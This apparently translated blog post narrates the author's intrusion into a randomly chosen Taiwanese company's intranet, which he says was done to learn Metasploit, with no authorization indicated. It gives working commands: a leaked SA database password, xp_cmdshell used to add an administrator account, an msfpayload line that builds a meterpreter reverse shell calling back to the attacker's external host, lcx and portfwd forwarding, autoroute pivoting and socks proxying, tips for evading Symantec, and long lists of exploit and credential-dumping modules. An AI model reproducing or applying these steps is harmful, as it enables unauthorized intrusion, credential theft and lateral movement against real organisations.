Date/time: in 2013, I haven't written a technical article for a long time. I remember writing about the application of MSF's reverse and bind rebound methods in actual combat. This time, I'll write a practical article on the comprehensive application of MSF to intranet penetration.
The infiltration process was not very smooth, but it was finally solved by various methods. This paper will record some difficulties and solutions.
0x01 Preface
Randomly find a site under a Vietnam Technology Group in Taiwan as the test target, just to learn about intranet penetration and the use of MSF. In September 2013, after getting the Webshell permission of a subdomain, the test did not continue. At that time, Symantec Symantec was not installed on the server, but it was found that Symantec had been installed and some security reinforcement had been carried out during the second test.
0x02 basic information collection of website and Intranet
Basic information detection:
Target site: http://www.ttes*****.com The server IP: 59.***.**.74(Taiwan Chunghwa Telecom) Environment platform: ASP.NET Server system: Microsoft-IIS/6.0(Wind 2003)
Site sub domain collection:
These subdomains in the table are the information collected in the early stage, but I didn't expect to get the Webshell (fckeeditor) very smoothly. If the master station can't find any vulnerabilities, you can start through "side station" or "subdomain".
Because this article focuses on the use and difficult solutions of MSF tools, I won't describe how to get the Webshell. The server information collected after getting the permission is as follows.
Port opening: 25, 80, 135, 445, 1025, 1521, 3389 Patch: 460 for the server system+patch(64 position) Script probing: server support Asp,Aspx Extended name Disk permissions: C,D Disks have read and write permissions (most)
From the ipconfig /all command, you can see that the host name is websrv4, IP: 192.168.0.203, DNS: 192.168.3.1.
Windows IP Configuration
Host Name . . . . . . . . . . . . : websrv4
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
DNS Servers . . . . . . . . . . . : 192.168.3.1
168.95.1.1net view /domain command can see that there are two domains and a working group: 7PV1V1S, TT, WORKGROUP, and the corresponding IP address of the surviving host, as shown in the figure below. You can also see that the currently controlled websrv4 host is in the working group.
There are many TT domain hosts. Another table should be placed. The domain control should be 192.168.3.1. Here, you can analyze the organizational structure of the working group and each domain and the roles of each host according to your own experience.
0x03 Webshell power raising encounter defense software
At present, the system of this controlled host is Windows 2003 X64. Although we know that there are not many available rights raising Exps for X64, we have to try it. The results all ended in failure. Oracle has not contacted the rights raising, so we don't know much about it. Let's put it aside for the time being.
As we all know, ASPX and MSSQL are the best partners on the web The database connection information can be found in the config file. Here you can see that the MSSQL database is running on the intranet 192.168.0.206 host, which belongs to station library separation.
<add name="ttes*****_enConnectionString1" connectionString="Data Source=192.168.0.206;Initial Catalog=ttes*****_global;Persist Security Info=True;User ID=sa;Password=tt@12345" providerName="System.Data.SqlClient"/>
Next, use the database management function of Malaysia to connect the MSSQL of 192.168.0.206 intranet host and enable XP_ The cmdshell component executes the command plus an administrator user, and then forwards its 3389 port with the portfwd command.
Note: some students may say that it is OK to directly use the port mapping function of DAMARI. Yes, but I haven't succeeded anyway. I don't know if there is a problem with my posture. Well, it must be. It's still too delicious!
The test $administrator user has been successfully added. The next step is to use the Lcx port forwarding tool. Everyone should understand that it is uploaded and executed on the 203 host, but the forwarding is 3389 of the 206 database host.
C:\RECYCLER\lcx.exe -slave Your Internet IP 51 192.168.0.206 3389
matters needing attention:
On September 13, 2013, there was no defense software on the host 192.168.0.203, which can be uploaded directly to LCX Exe to any read-write directory and execute normally. But when I wrote this article, I found that symantec and LCX had been installed Exe and various rights raising Exps are intercepted during uploading. The commonly used Vbs, Bat, EXE, upload, download, modification and expansion methods are also tried. As long as the operation detected as malicious behavior will be intercepted.
symantec endpoint protection Process: smc.exe,snac.exe,ccsvchst.exe,rtvscan.exe symantec endpoint protection The risk log of the defense software is only saved for 14 days by default, and can be set by yourself after entering the server
In the later test, it was also found that the Webshell uploaded by Fckeditor was also blocked, such as one sentence, pony, horse, etc. as shown in the figure below, you can test more horses that have passed the WAF to see if they can bypass it?
Test record:
Intranet environment, station library separation, web.config find data(192.168.0.206)SA User, successfully added administrator user; Web(192.168.0.203) ,data(192.168.0.206)It's all installed symantec,out of commission Lcx.exe And other tools; Tested that other forwarding tools are either blocked or unavailable, and reDuh Only the current 203 can be forwarded, and the speed is very slow; msfpayload Generated Exe The files were also checked and killed. The server is X64,msfencode Not in X64 Encoder, this road is blocked;
0x04 bypass the defense software for port forwarding
Get the idea in an article through Google search, generate an Aspx rebound script using msfpayload, get the meterpreter session, and then forward the 3389 port of the database server 192.168.0.206 with the portfwd command.
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=113.***.*.238 LPORT=12345 R | msfencode -t aspx -o /media/sf_Systematic learning/test.aspx
msfconsole configures the listening related options and sends the newly generated test The ASPX rebound script is uploaded to the WEB directory of the website, and then accessed in the browser to get the target host session.
root@box3:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.7 msf exploit(handler) > set LPORT 12345 msf exploit(handler) > exploit
Then we use the portfwd command to forward the 3389 port of the database server 192.168.0.206 in the intranet to the 3389 remote terminal that can normally connect to it. The relevant command parameters are as follows. I forgot the screenshot at that time!
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.0.206
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.0.206:3389
Usage: portfwd [-h] [add | delete | list | flush] [args]
Add delete List refresh parameter
OPTIONS:
-h Help banner. // help
-L <opt> The local host to listen on (optional). // Local IP address
-l <opt> The local port to listen on. // Local port number
-r <opt> The remote host to connect to. // Remote IP address
-p <opt> The remote port to connect to. // Remote port numberNext, let's talk about connecting 3389 in the intranet with Socks4a proxy in MSF. Before starting Socks4a proxy, you must first get a Meterpreter session, and then directly use Socks4a module to start the proxy. It can be executed by default.
msf auxiliary(socks4a) > use auxiliary/server/socks4a msf auxiliary(socks4a) > set SRVHOST 127.0.0.1 msf auxiliary(socks4a) > run [*] Auxiliary module execution completed msf auxiliary(socks4a) > [*] Starting the socks4a proxy server
When configuring proxychains agent tool, you need to use / etc / proxychains Add a "socks4 127.0.0.1 1080" at the bottom of the conf file, which must be consistent with the SRVHOST and SRVPORT parameters in the socks4a module.
root@box3:~# vi /etc/proxychains.conf
Start the Socks4a agent and configure the proxychains agent tool. At this time, we can directly use the proxychains agent msf/nmap/sqlmap/nessus/mysql/sqsh/rdesktop/ftp/ssh in the command terminal to scan and test other hosts in the target intranet.
root@box3:~# proxychains msfconsole -q root@box3:~# proxychains rdesktop 192.168.0.206
Note: when the Socks4a agent is enabled but cannot be used normally, it may be a firewall problem. At this time, you can try to set the SRVHOST parameter to 127.0.0.1, the default is 0.0.0.0, and the port is 1080. Remember not to confuse the agent with the agent tool!!!
2014-07-28: after retesting, I found that I couldn't play back with the original method, and then I tried reDuh_Gui,reverse_ TCP port 80 In other ways, the data is connected and the TCP connection status is LISTENING, but the connection is not connected or the session is not bounced back.
Final breakthrough and follow-up ideas: use kill free LCX Exe tool, listen to port 80 locally, disable Symantec defense software after entering the 192.168.0.206 database server, then run MSF attack payload, and then further penetrate other hosts in the intranet.
0x05 obtain the open port and system version of segment C
Using get in the current session_ local_ The subnets script obtains the local subnet segment and establishes a routing table between the current session and Kali's local machine to achieve cross routing access. In this way, the module under the MSF framework can be directly used to scan and test other hosts in the target intranet.
meterpreter > run get_local_subnets Local subnet: 192.168.0.0/255.255.255.0 meterpreter > run autoroute -s 192.168.0.0/255.255.255.0 [*] Adding a route to 192.168.0.0/... [+] Added route to 192.168.0.0/ via 59.***.**.66 [*] Use the -p option to list all active routes //1 is the session id of sessions. Don't make a mistake when routing! msf exploit(handler) > route add 192.168.0.0 255.255.255.0 1 //View all routes currently active meterpreter > run autoroute -p msf exploit(handler) > route print
Use the auxiliary/scanner/portscan/tcp module under MSF to conduct batch port scanning on the C segment of the target intranet. This module can easily detect the port opening of the whole C segment host, which makes us more comfortable in the later penetration test.
Here, the author mainly scans these common ports: 21 / 22 / 445 / 1433 / 3306 / 3389 for demonstration. Other more common ports are: 23 / 25 / 80 / 110 / 135 / 139 / 1521 / 8080 / 14147 / 43958, etc.
msf exploit(handler) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 192.168.0.1-254 msf auxiliary(tcp) > set PORTS 21,22,445,1433,3306,3389 msf auxiliary(tcp) > set THREADS 50 msf auxiliary(tcp) > exploit
If it is too slow, you can choose to add threads appropriately. You need to wait for a period of time during the scanning process. After that, you can use the command parameters such as hosts and services to view the scanning results. On the premise of connecting to the PostgreSQL database, the port scanning results are shown in the figure below.
We can also use the following modules to detect the surviving host, system version, software version, computer name, MAC address, workgroup or domain, etc. only some commonly used modules are listed here. The pictures are from @ OffSec!
auxiliary/scanner/portscan/tcp auxiliary/scanner/portscan/ack auxiliary/scanner/portscan/syn auxiliary/scanner/ftp/ftp_version auxiliary/scanner/ssh/ssh_version auxiliary/scanner/smb/smb_version auxiliary/scanner/dns/dns_amp auxiliary/scanner/http/title auxiliary/scanner/http/http_version auxiliary/scanner/telnet/telnet_version auxiliary/scanner/mysql/mysql_version auxiliary/scanner/postgres/postgres_version auxiliary/scanner/netbios/nbname auxiliary/scanner/netbios/nbname_probe //Deleted auxiliary/scanner/discovery/arp_sweep auxiliary/scanner/discovery/udp_probe auxiliary/scanner/discovery/udp_sweep [...SNIP...]
0x06 common service brute force cracking and utilization module
Collect more user, password and other information on the host that has obtained the permission, including user passwords stored in the third party, SSH/RDP, various websites / databases, text or tables, and then analyze them to see whether there is a law or general possibility. If so, we can generate an efficient dictionary according to the law and use the following modules for blasting and utilization, Picture from @ OffSec!
Note: some modules are also newly added when re editing this article. Since they have been reorganized, why not complete them? Obsessive compulsive disorder again! At present, I often use these modules. If the masters have other commonly used modules, they can also add them.
auxiliary/scanner/ftp/anonymous auxiliary/scanner/ftp/ftp_login auxiliary/scanner/ssh/ssh_login auxiliary/scanner/ssh/ssh_login_pubkey auxiliary/dos/windows/ftp/filezilla_admin_user auxiliary/dos/windows/ftp/filezilla_server_port post/windows/gather/credentials/flashfxp post/windows/gather/credentials/smartftp post/windows/gather/credentials/wsftp_client post/windows/gather/credentials/filezilla_server post/windows/gather/credentials/xshell_xftp_password post/multi/gather/filezilla_client_cred auxiliary/scanner/smb/smb_login auxiliary/admin/smb/upload_file exploit/windows/smb/psexec exploit/windows/smb/ms08_067_netapi auxiliary/scanner/smb/smb_ms17_010 exploit/windows/smb/ms17_010_psexec auxiliary/admin/smb/ms17_010_command exploit/windows/smb/ms17_010_eternalblue exploit/windows/smb/webexec auxiliary/admin/smb/webexec_command auxiliary/scanner/smb/impacket/wmiexec auxiliary/admin/mysql/mysql_enum auxiliary/admin/mysql/mysql_sql auxiliary/scanner/mysql/mysql_login auxiliary/scanner/mysql/mysql_hashdump exploit/windows/mysql/mysql_mof exploit/multi/mysql/mysql_udf_payload auxiliary/admin/mssql/mssql_enum auxiliary/admin/mssql/mssql_exec auxiliary/admin/mssql/mssql_sql auxiliary/admin/mssql/mssql_escalate_dbowner auxiliary/scanner/mssql/mssql_ping auxiliary/scanner/mssql/mssql_login auxiliary/scanner/mssql/mssql_hashdump exploit/windows/mssql/mssql_clr_payload exploit/windows/mssql/mssql_payload exploit/windows/mssql/mssql_payload_sqli post/windows/manage/enable_rdp post/windows/gather/enum_termserv post/windows/gather/credentials/mremote auxiliary/scanner/rdp/ms12_020_check auxiliary/dos/windows/rdp/ms12_020_maxchannelids auxiliary/scanner/rdp/cve_2019_0708_bluekeep exploit/windows/rdp/cve_2019_0708_bluekeep_rce exploit/windows/rdp/rdp_doublepulsar_rce [...SNIP...]
Official user manual:
https://www.offensive-security.com/metasploit-unleashed/auxiliary-module-reference
0x07 actual combat process problems and some words to say
1, Practical process problems
Many exploits in MSF are just soft. They can hardly pass Symantec / Kaspersky / 360, @ brother Moker reminded;
- The target belongs to the Intranet environment and has only Webshell permission. At this time, we can use the detour tactics. First enter the intranet to collect the password combination dictionary, and then go to our target host;
- Can MSF scan segment a and B hosts in the intranet? A: it should be OK, but IDS will give an alarm instantly when scanning the hosts in Section A and B, because the traffic is too large, it is not recommended to try;
- Use MS08_ 067_ netapi + bind_ In case of TCP forward batch overflow, if there is anti-virus software in the intranet host, there will be an interception prompt. The movement is too loud, and it is not recommended to try;
Question 1 Use LCX. On the Webshell of 203 Exe forward to 206 database server, and check why the source network address of "Event Viewer" - > "security" is 192.168.0.203? And the host name is my local host name. Don't you understand it?
Answer 1: because the data is forwarded through the server 203 during connection, the source network address is 192.168.0.203, but the data packet is sent locally, so the host name is still your machine name. This would not happen if agents were used.
Question 2 Connect to the 206 database server in the Webshell of 203 through XP_ The cmdshell checks that there is Symantec defense software in the process, but why is there only the system default running process and no Symantec process in the task manager after entering the 206 server?
Answer 2: because you didn't click to view all processes in the task manager, ^. ^!!!
2, Something to say
In fact, the general idea is that as mentioned above, I finally got dozens of host permissions, including TT domain control permissions. However, because I was busy with other things in the middle of the article at that time, when I came back for testing after a few months, I found that the permissions had been lost. Therefore, this article is not complete, and most of the pictures have not been intercepted. It is really a pity, Let's make do with it!